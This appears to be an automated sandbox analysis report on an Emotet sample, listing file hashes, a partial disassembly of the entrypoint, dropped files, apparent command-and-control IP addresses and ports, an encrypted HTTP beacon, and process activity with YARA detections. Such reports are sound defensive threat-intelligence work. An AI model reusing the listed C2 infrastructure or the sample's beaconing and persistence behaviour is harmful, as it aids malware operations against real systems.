	newordermx.exe	Get hash	malicious	Browse	45.33.2.79
	sample.exe	Get hash	malicious	Browse	66.228.32.51
	BnJvVt951o.exe	Get hash	malicious	Browse	45.33.54.74
	BnJvVt951o.exe	Get hash	malicious	Browse	45.33.54.74
	SMtbg7yHyR.exe	Get hash	malicious	Browse	45.33.54.74
	9fdUNaHzLv.exe	Get hash	malicious	Browse	173.230.145.224
	Private doc.docm	Get hash	malicious	Browse	212.71.251.238
	invoice_document.docm	Get hash	malicious	Browse	212.71.251.238
	sample.exe.exe	Get hash	malicious	Browse	173.230.145.224
	Document_Opener.exe.14.exe	Get hash	malicious	Browse	88.80.186.210
	Audio playback (7656) for joew Camrosa.htm	Get hash	malicious	Browse	192.81.132.201

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5945091579415647
Encrypted:	false
SSDEEP:	6:b/9Mk1GaD0JOCEfMuaaD0JOCEfMKQmDuglutAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bFTGaD0JcaaD0JwQQvMtAg/0bjSQJ
MD5:	B8141D5FB94D81C236A3850842C2DCB0
SHA1:	6D3A42C20F0DBE15E35F1A699F9F4FD1FE33A216
SHA-256:	40825CD64E846C07ACE736AEA4DDB1D328737CA6502C9CE45FE87588CFC20A51
SHA-512:	77AD6F6B24F4A939F07CB215999B8615EED0310065DD2E8BA70C8B5182256183CF6A341B37640BFCFF98EE376565936B12C973C99A8DCDD93B90E8A432AC1857
Malicious:	false
Preview:	....E..h..(.....70...yo.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................70...yo...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xbfc40e49, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09625771879899726
Encrypted:	false
SSDEEP:	6:jGzwl/+t1RIE11Y8TRXdhgyKEgDqKNGzwl/+t1RIE11Y8TRXdhgyKEgDqK:60+HO4bldhgDqKo0+HO4bldhgDqK
MD5:	8ADEC58212E6A3CE099F161BBEBB0BC9
SHA1:	06F7543B4E1A510DF40D3F76E133CF1553A2A780
SHA-256:	E5C8B7661E7A8C07DDF8C30844D5F7D30CA2991393A0903D030298EAF51FB97B
SHA-512:	2432E9382E0B205452E0A3F442A5AFDC14DFEB6C1D8AF2A9CBF4FF8F10171FB985B863A9DF1F3BE670AB3E1C029EDCB5A51BB7DDBB968F41DFF8CCE1C06F5429
Malicious:	false
Preview:	...I... ................e.f.3...w........................&..........w..70...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................4>.170...y.m.................0o.70...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.11080661537104357
Encrypted:	false
SSDEEP:	3:I85Wlll7EvSVgnW+j8l/bJdAtiMKEgnDill:I8oiSz+j8t4JKEgDG
MD5:	17695210CCB5BE643D027E7D00430C98
SHA1:	B34646EAD5AC480AAD82647BCEF68C4F7434730F
SHA-256:	FA78C268854285C3EB97C0B76005F20394AC5D280FCCB2789D78688642BD395E
SHA-512:	11B0A80E3157F05ADCF7B9FC14F147E212ECFF9AA869B09CF87D2764405EABCD032A45AD94FF563E17CC2FE47B65E1A85CFB48745DDCD5E2D41070C8F864E248
Malicious:	false
Preview:	.h.......................................3...w..70...y.......w...............w.......w....:O.....w...................0o.70...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.139512705324357
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rZlImYk9+MlWlLehB4yAq7ejC4lImR:OaqdmuF3rrp+kWReH4yJ7MTj
MD5:	33AFCAB4AB507523C74127DF398D33DD
SHA1:	CC3DC6E5799695A314B4E445AE9853BBDBA37FA8
SHA-256:	46CBB9051A29549F21CB47E4723C040ABE4782E2A56C8E08A2AC5ABA08E5D90C
SHA-512:	F624013A0C8B7995DC0853161369B593A750CCFD3A6F4A5AA4DA277B0F513C7502B422A4217077B7823818EC5A66B52D34F27DB8672472CE6A27C1EB0236D9B7
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. A.p.r. .. 1.1. .. 2.0.2.1. .2.2.:.5.0.:.1.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. A.p.r. .. 1.1. .. 2.0.2.1. .2.2.:.5.0.:.1.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.436116781781946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	malware.exe
File size:	45568
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
SHA512:	3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
SSDEEP:	768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x409ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4cfe8bbfb0ca5b84bbad08b043ea0c87

Entrypoint Preview

Instruction
push esi
push 0040C1F0h
push 3966646Ch
push 00000009h
mov ecx, D22E2014h
call 00007FBB5CF61EDEh
mov edx, 004011F0h
mov ecx, eax
call 00007FBB5CF61E02h
add esp, 0Ch
mov ecx, 8F7EE672h
push 0040C0D0h
push 6677A1D2h
push 00000048h
call 00007FBB5CF61EB9h
mov edx, 004010D0h
mov ecx, eax
call 00007FBB5CF61DDDh
add esp, 0Ch
push 08000000h
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C10Ch]
mov esi, eax
test esi, esi
je 00007FBB5CF6A218h
push 08000000h
push 00000000h
push esi
call dword ptr [0040C1F8h]
add esp, 0Ch
push esi
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C1E8h]
call 00007FBB5CF6183Ah
push 00000000h
call dword ptr [0040C1ACh]
pop esi
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, edx
mov dword ptr [ebp-0Ch], ecx
mov esi, 00000001h
mov dword ptr [ebp-08h], esi
mov eax, dword ptr [edi]
cmp eax, 7Fh
jbe 00007FBB5CF6A201h
lea ecx, dword ptr [ecx+00h]
shr eax, 07h
inc esi
cmp eax, 7Fh

Rich Headers

Programming Language:

[LNK] VS2013 UPD4 build 31101
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbad0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9883	0x9a00	False	0.503297483766	data	6.45508103349	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0xb2e	0xc00	False	0.160807291667	data	4.23495809712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0xbd8	0x200	False	0.123046875	data	0.91267432928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xd000	0x5cc	0x600	False	0.8671875	data	6.49434732961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	WTSGetActiveConsoleSessionId

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2021 22:48:34.684144974 CEST	49714	443	192.168.2.3	79.172.249.82
Apr 11, 2021 22:48:34.737350941 CEST	443	49714	79.172.249.82	192.168.2.3
Apr 11, 2021 22:48:34.737529993 CEST	49714	443	192.168.2.3	79.172.249.82
Apr 11, 2021 22:48:34.738641024 CEST	49714	443	192.168.2.3	79.172.249.82
Apr 11, 2021 22:48:34.792085886 CEST	443	49714	79.172.249.82	192.168.2.3
Apr 11, 2021 22:48:34.792378902 CEST	443	49714	79.172.249.82	192.168.2.3
Apr 11, 2021 22:48:34.792413950 CEST	443	49714	79.172.249.82	192.168.2.3
Apr 11, 2021 22:48:34.792681932 CEST	49714	443	192.168.2.3	79.172.249.82
Apr 11, 2021 22:48:34.793029070 CEST	49714	443	192.168.2.3	79.172.249.82
Apr 11, 2021 22:48:34.847615957 CEST	443	49714	79.172.249.82	192.168.2.3
Apr 11, 2021 22:49:05.219919920 CEST	49729	8080	192.168.2.3	193.169.54.12
Apr 11, 2021 22:49:08.248748064 CEST	49729	8080	192.168.2.3	193.169.54.12
Apr 11, 2021 22:49:14.249320030 CEST	49729	8080	192.168.2.3	193.169.54.12
Apr 11, 2021 22:49:57.262404919 CEST	49748	8080	192.168.2.3	173.230.145.224
Apr 11, 2021 22:49:57.461833954 CEST	8080	49748	173.230.145.224	192.168.2.3
Apr 11, 2021 22:49:57.971726894 CEST	49748	8080	192.168.2.3	173.230.145.224
Apr 11, 2021 22:49:58.171425104 CEST	8080	49748	173.230.145.224	192.168.2.3
Apr 11, 2021 22:49:58.674783945 CEST	49748	8080	192.168.2.3	173.230.145.224
Apr 11, 2021 22:49:58.874056101 CEST	8080	49748	173.230.145.224	192.168.2.3
Apr 11, 2021 22:50:29.219372034 CEST	49750	7080	192.168.2.3	80.86.91.232
Apr 11, 2021 22:50:32.224535942 CEST	49750	7080	192.168.2.3	80.86.91.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2021 22:48:19.813020945 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:19.861968040 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:21.446615934 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:21.497994900 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:52.234143019 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:52.291568041 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:52.731614113 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:52.781944990 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:55.345673084 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:55.394505024 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:56.681473970 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:56.735254049 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:57.672108889 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:57.724541903 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:58.742270947 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:58.799360991 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 11, 2021 22:48:58.961103916 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:48:59.039675951 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:02.721493959 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:02.773525953 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:03.567709923 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:03.622742891 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:04.683196068 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:04.735991955 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:05.415565968 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:05.474628925 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:05.865742922 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:05.925111055 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:07.177627087 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:07.226506948 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:08.393435955 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:08.443283081 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:09.599481106 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:09.649430037 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:10.425113916 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:10.475244999 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:11.670397043 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:11.723275900 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:12.800277948 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:12.851917982 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:13.703665972 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:13.761049032 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:15.617786884 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:15.674741030 CEST	53	50713	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:15.822659969 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:15.890722990 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:19.185956955 CEST	58987	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:19.244398117 CEST	53	58987	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:56.021043062 CEST	56579	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:56.069636106 CEST	53	56579	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:56.864008904 CEST	60633	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:56.922722101 CEST	53	60633	8.8.8.8	192.168.2.3
Apr 11, 2021 22:49:58.101824045 CEST	61292	53	192.168.2.3	8.8.8.8
Apr 11, 2021 22:49:58.155498028 CEST	53	61292	8.8.8.8	192.168.2.3

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 11, 2021 22:49:56.069636106 CEST	8.8.8.8	192.168.2.3	0x4248	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

79.172.249.82:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49714	79.172.249.82	443	C:\Windows\SysWOW64\mathsearch.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2021 22:48:34.738641024 CEST	1062	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 79.172.249.82:443 Content-Length: 436 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 16 50 55 21 e4 18 44 7d b0 5d 87 c4 db 81 70 59 7d 54 82 67 dd 4e ee d0 7b 66 ee 69 c0 67 1a f5 7c 2e d1 06 d8 24 d8 4b 81 7a 42 97 20 c8 21 ef d9 72 53 e9 1c 3b a7 be d9 56 f5 40 91 09 1a 48 8c ec 39 06 49 c1 b2 1a 5d 19 fd 45 74 49 34 95 01 0f a9 03 1b 3e 06 f5 52 13 e7 34 64 42 5a 0b 4b 0b ef d6 cc cf 14 c8 f7 20 4a 1b ad 0c d9 85 8e b8 e1 ce e2 52 46 b1 5d 03 29 81 4f f5 c8 20 3b 24 b2 56 4d 7d 6f 68 e4 71 ad 0c 38 f6 02 86 d7 b6 c3 61 b2 aa 40 2d 7e 4b 22 ec 25 b1 5c 9f 7e 5e ab ba 96 10 6f e6 d2 69 b2 16 c9 f6 ce a5 6a c0 b9 5a f4 98 f6 5e 64 ea 57 8e 4d 36 c4 0a d1 a1 f6 7f e2 34 4e dc 49 d5 d2 b4 10 89 26 70 95 61 f9 48 a8 cd 60 dc 38 7a 39 d0 1b de 15 18 29 41 43 33 b3 7d 12 79 ef 8b e1 7b 6b 86 c4 be 04 5e ac 6a c1 64 d1 91 71 a8 6b d6 50 bb e8 3f e2 9d 06 ae a6 73 c2 7a 59 c4 8b 55 19 4a 6d b6 5b a6 2e a1 b5 56 6b 81 44 09 80 ab 33 71 53 34 d0 b0 80 26 f5 08 57 b9 59 e3 e8 a9 d1 5d a3 2d 40 e2 61 96 63 d2 e6 8f 70 43 2f aa 62 94 0a f4 3b fd 20 b9 68 30 02 fe 8c ad 75 8e 1f 8b 8a d7 d1 b3 80 b5 fb 69 62 4f 1e 16 91 3d c1 65 6a a6 61 7a 51 80 72 a9 da 21 1a a9 78 6b 0f 18 f9 a7 1f 62 e9 4c 8b 36 bf e8 23 11 1f 40 b0 e5 9a cc 81 e9 12 71 d5 cb a9 37 3f 28 d9 42 60 dc 60 9f be 12 da d2 03 7d 9f c1 ca d8 8a f2 cf 33 cd 79 4c 61 71 21 69 82 c6 da 4d 04 a1 13 56 70 18 74 61 a3 78 f9 Data Ascii: PU!D}]pY}TgN{fig\|.$KzB !rS;V@H9I]EtI4>R4dBZK JRF])O ;$VM}ohq8a@-~K"%\~^oijZ^dWM64NI&paH`8z9)AC3}y{k^jdqkP?szYUJm[.VkD3qS4&WY]-@acpC/b; h0uibO=ejazQr!xkbL6#@q7?(B``}3yLaq!iMVptax
Apr 11, 2021 22:48:34.792378902 CEST	1062	IN	HTTP/1.1 400 Bad Request Date: Sun, 11 Apr 2021 20:48:34 GMT Server: Apache/2.4.25 (Debian) Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: svchost.exe PID: 1152 Parent PID: 568

General

Start time:	22:48:25
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: malware.exe PID: 160 Parent PID: 5744

General

Start time:	22:48:25
Start date:	11/04/2021
Path:	C:\Users\user\Desktop\malware.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\malware.exe'
Imagebase:	0x50000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.193972656.0000000000051000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: malware.exe PID: 6072 Parent PID: 160

General

Start time:	22:48:25
Start date:	11/04/2021
Path:	C:\Users\user\Desktop\malware.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\malware.exe
Imagebase:	0x50000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.202770613.0000000000051000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.194767898.0000000000051000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: mathsearch.exe PID: 5844 Parent PID: 568

General

Start time:	22:48:28
Start date:	11/04/2021
Path:	C:\Windows\SysWOW64\mathsearch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mathsearch.exe
Imagebase:	0x50000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.202524234.0000000000051000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.200691249.0000000000051000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: mathsearch.exe PID: 5372 Parent PID: 5844

General

Start time:	22:48:28
Start date:	11/04/2021
Path:	C:\Windows\SysWOW64\mathsearch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mathsearch.exe
Imagebase:	0x50000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.461993128.0000000000051000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000000.201510577.0000000000051000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 3420 Parent PID: 568

General

Start time:	22:48:52
Start date:	11/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

